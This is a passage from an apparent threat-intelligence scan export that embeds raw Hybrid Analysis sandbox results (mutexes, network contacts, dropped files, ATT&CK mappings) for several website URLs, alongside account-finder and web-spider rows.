"\\Sessions\\1\\BaseNamedObjects\\SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:49730"\n "68.142.107.4:49733"\n "142.250.191.74:49734"\n "142.251.46.227:49735"\n "142.250.189.232:49736"\n "142.250.191.78:49744"\n "185.199.108.153:49747"\n "23.55.103.80:49749"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.yeulpay.com"\n "yeulpay.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsyeulpay.com" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\000003.log]- [targetUID: 00000000-00005812]\n "strings.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\json\\i18n-shared-components\\zh-Hant\\strings.json]- [targetUID: 00000000-00005812]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\index]- [targetUID: 00000000-00005812]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "PNG image data 1024 x 643 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "5dcfc9f4-1776-49aa-935c-1f8871834b22.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\5dcfc9f4-1776-49aa-935c-1f8871834b22.tmp]- [targetUID: 00000000-00005812]\n "b31f9cdb-f68d-4780-a157-ca8e18af8710.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\b31f9cdb-f68d-4780-a157-ca8e18af8710.tmp]- [targetUID: 00000000-00005812]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00005812]\n "4c8bd346-dc18-45c0-b9fa-b2f2b3599a07.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4c8bd346-dc18-45c0-b9fa-b2f2b3599a07.tmp]- [targetUID: 00000000-00005812]\n "f_000243" has type "PNG image data 4000 x 2880 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "3bd3bf42-f525-46e9-8ae8-301ffa930aef.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\3bd3bf42-f525-46e9-8ae8-301ffa930aef.tmp]- [targetUID: 00000000-00001448]\n "f_00023d" has type "PNG image data 600 x 403 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "273a52e5-bd0c-47dd-8351-2a5b9f66dcbd.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\273a52e5-bd0c-47dd-8351-2a5b9f66dcbd.tmp]- [targetUID: 00000000-00005812]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00005812]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\manifest.fingerprint]- [targetUID: 00000000-00005812]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\111.0.1661.54\\WidevineCdm\\manifest.json]- [targetUID: 00000000-00005812]\n "data_2" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_2]- [targetUID: 00000000-00005812]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-50', u'name': u'Creates a license file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"wallet-drawer.bundle.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\Wallet-Checkout\\wallet-drawer.bundle.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "tokenized-card.bundle.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\Tokenized-Card\\tokenized-card.bundle.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "edge_driver.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\edge_driver.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "shopping_iframe_driver.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\shopping_iframe_driver.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "notification.bundle.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\Notification\\notification.bundle.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "vendor.bundle.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\vendor.bundle.js.LICENSE.txt]- [targetUID: 00000000-00005812]'}, {u'category': u'Environment Awareness', u'origin': u'API Call', u'identifier': u'api-169', u'name': u'Tries to access recent files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations"\n "msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\O3IGZQ735L74LO6YZ5IP.TEMP"\n "msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\O3IGZQ735L74LO6YZ5IP.temp"\n "msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ccba5a5986c77e43.customDestinations-ms"\n "msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ccba5a5986c77e43.customDestinations-ms~RF12dcbc.TMP"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://yeulpay.com/"\n Pattern match: "https://www.googletagmanager.com/gtag/js?id=G-4HDJ19RJFF"\n Pattern match: "https://yeulpay.com"\n Pattern match: "www.yeulpay.com"\n Pattern match: "http://www.w3.org/2000/svg"\n Heuristic match: "yeulpay.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://yeulpay.com,supports_spdy:true},{alternative_servic | 185.199.109.153 |
| 2023-05-12 02:55:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 18, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://bouncefitness.precisiongroup.com.au/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "KERNEL32" at base e6440000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base e4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base e4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base e4ee0000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\IMM32.DLL" at base e5c90000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base e4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base e4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base e4ee0000\n "msedge.exe" loaded module "C:\\WINDOWS\\TEMP\\VXOLE64.DLL" at base d79d0000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\UXTHEME.DLL" at base e2950000\n "msedge.exe" loaded module "COMBASE.DLL" at base e5890000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base cbc50000\n "msedge.exe" loaded module "NTDLL.DLL" at base e7fc0000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base e57e0000\n "msedge.exe" loaded module "SHELL32.DLL" at base e64f0000\n "msedge.exe" loaded module "KERNEL32.DLL" at base e6440000'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.166:443"\n "142.250.191.67:443"\n "142.251.214.138:443"\n "192.0.77.48:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6648:120:WilError_01"\n "Local\\SM0:7476:304:WilStaging_02"\n "SM0:7476:120:WilError_01"\n "Local\\SM0:7476:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:6648:120:WilError_01"\n "SM0:6648:304:WilStaging_02"\n "Local\\SM0:6648:304:WilStaging_02"\n "Local\\SM0:6648:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6648:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6648:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6648:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bouncefitness.precisiongroup.com.au"\n "s.w.org"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Session Storage\\000003.log]- [targetUID: 00000000-00006648]\n "4f425c3f3dfe5186_0" has type "data"- [targetUID: N/A]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\crl-set]- [targetUID: 00000000-00006648]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006648]\n "f_00023e" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00006052]\n "f_000243" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 7344x4896 components 3"- [targetUID: N/A]\n "f_00023d" has type "Web Open Font Format (Version 2) TrueType length 30928 version 1.0"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00006052]\n "8b46efee-46c4-4b8c-8098-94cddde924df.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\manifest.json]- [targetUID: 00000000-00006648]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\6648_221812043\\_metadata\\verified_contents.json]- [targetUID: 00000000-00006648]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006648]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00006648]\n "Tabs_13321943281147618" has type "data"- [targetUID: N/A]\n "00a31e27ed9e467d_0" has type "data"- [targetUID: N/A]\n "65445c8f0619d12d_0" has type "data"- [targetUID: N/A]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\manifest.json]- [targetUID: 00000000-00006648]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00006648]\n "25e25f713af3e351_0" has type "data"- [targetUID: N/A]\n "ed6a3a53-c5b6-484b-8bb5-d2ee85f07349.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\ed6a3a53-c5b6-484b-8bb5-d2ee85f07349.tmp]- [targetUID: 00000000-00006648]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://bouncefitness.precisiongroup.com.au/"\n Pattern match: "https://bouncefitness.precisiongroup.com.au"\n Heuristic match: "bouncefitness.precisiongroup.com.au"\n Heuristic match: "s.w.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/90 Antivirus vendors marked sample as malicious (1% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'63fc26ad86a713231f0ec51d', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'suspicious_identifiers': [], u'attck_id': u'T1129', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Shared Modules', u'informative_identifiers': [], u'tactic': u'Execution', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u | 104.21.6.166 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | BiggerPockets (Category: finance)
https://www.biggerpockets.com/users/login | login |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/./script.js | https://fluid.battleb0t.xyz/ |
| 2023-05-12 02:53:14 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://goo.gl/uqaWYa', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_6c8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1736"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_6c8_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_6c8_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_6c8_ConnHashTable<1736>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_6c8_IE_EarlyTabStart_0xaf0_Mutex"\n "IsoScope_6c8_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_6c8_IE_EarlyTabStart_0xaf0_Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"74.208.236.106:80"\n "74.208.236.106:443"\n "172.217.12.106:443"\n "104.18.10.207:443"\n "185.199.109.153:443"\n "142.250.72.202:443"\n "142.251.214.131:443"\n "142.250.189.206:443"\n "142.251.214.130:443"\n "142.251.46.230:443"\n "142.251.46.170:443"\n "52.155.62.95:443"\n "172.217.12.118:443"\n "172.217.12.97:443"\n "142.250.189.238:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"chrisfixed.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "chrisfixed.com"\n "fe0.google.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "goo.gl"\n "googleads.g.doubleclick.net"\n "i.ytimg.com"\n "jnn-pa.googleapis.com"\n "play.google.com"\n "query.prod.cms.msn.com"\n "stackpath.bootstrapcdn.com"\n "static.doubleclick.net"\n "teredo.ipv6.microsoft.com"\n "trenta.media"\n "www.chris-fix.com"\n "www.youtube.com"\n "yt3.ggpht.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "VISITOR_INFO1_LIVEziB5upP7Wiwyoutube.com/214749286534253099523106746390550359831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "5O0LJ4LH.txt")\n Found string "VISITOR_INFO1_LIVEDU_B5bFhQnkyoutube.com/214749286534253099523106746390472234831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "DQKYX181.txt")\n Found string "VISITOR_INFO1_LIVEi1ZA35yJPt8youtube.com/214749286534253099523106746390597234831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "7JFMJ9XY.txt")\n Found string "VISITOR_INFO1_LIVE-bsB1yN3wW0youtube.com/214749286534253099523106746390784734831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "7E6JY8J0.txt")\n file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "function bz(a,b){var c=this;return b}bz.M="internal.enableAutoEventOnScroll";var bc=ca(["data-gtm-yt-inspected-"]),cz=["www.youtube.com","www.youtube-nocookie.com"],dz,ez=!1;" (Indicator: "dir "; File: "js_2_.js")\n Found string "www.youtube.com" (Indicator: "dir "; File: "PCAP")\n file/memory contains long string with (Indicator: "dir "; File: "SSL")\n file/memory contains long string with (Indicator: "dir "; File: "base_1_.js")\n Found string "{Bo:"r",Do:Eo()}:"youtube.player.web_20230502_00_RC00".includes("gam_native_web_video")?{Bo:"n",Do:Eo()}:"youtube.player.web_20230502_00_RC00".includes("admob_interstitial_video")?{Bo:"int",Do:Eo()}:{Bo:"j",Do:null}};" (Indicator: "dir "; File: "base_1_.js")\n Found string "By=function(a){a=g.Si(a);a=null!==a?a.split(".").reverse():null;return null===a?!1:"com"==a[0]&&a[1].match(/^youtube(?:kids|-nocookie)?$/)?!0:!1};" (Indicator: "dir "; File: "base_1_.js")\n Found string "g.Uy=function(a,b,c,d,e){Sy||Ty.set(""+a,b,{IG:c,path:"/",domain:void 0===d?"youtube.com":d,W8:void 0===e?!1:e})};" (Indicator: "dir "; File: "base_1_.js")\n Found string "g.Wy=function(a,b,c){Sy||Ty.remove(""+a,void 0===b?"/":b,void 0===c?"youtube.com":c)};" (Indicator: "dir "; File: "base_1_.js")\n Found string "sna=function(){this.j=g.hy("ALT_PREF_COOKIE_NAME","PREF");this.u=g.hy("ALT_PREF_COOKIE_DOMAIN","youtube.com");var a=g.Vy(this.j);a&&this.parse(a)};" (Indicator: "dir "; File: "base_1_.js")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"insta-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "twitter-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "fb-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "sddefault_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 640x480 components 3" and extension "jpg"\n "sddefault_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 640x480 components 3" and extension "jpg"\n "yt-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "unnamed_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 Exif Standard: [TIFF image data little-endian direntries=1 software=Google] baseline precision 8 68x68 components 3" and extension "jpg"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{6e883627-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe5a84e0c629be7b2.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\favorites\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\desktop\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{6e883629-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa2a380ccf94f2bd9.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\0x82k3c6.txt"\n "iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', 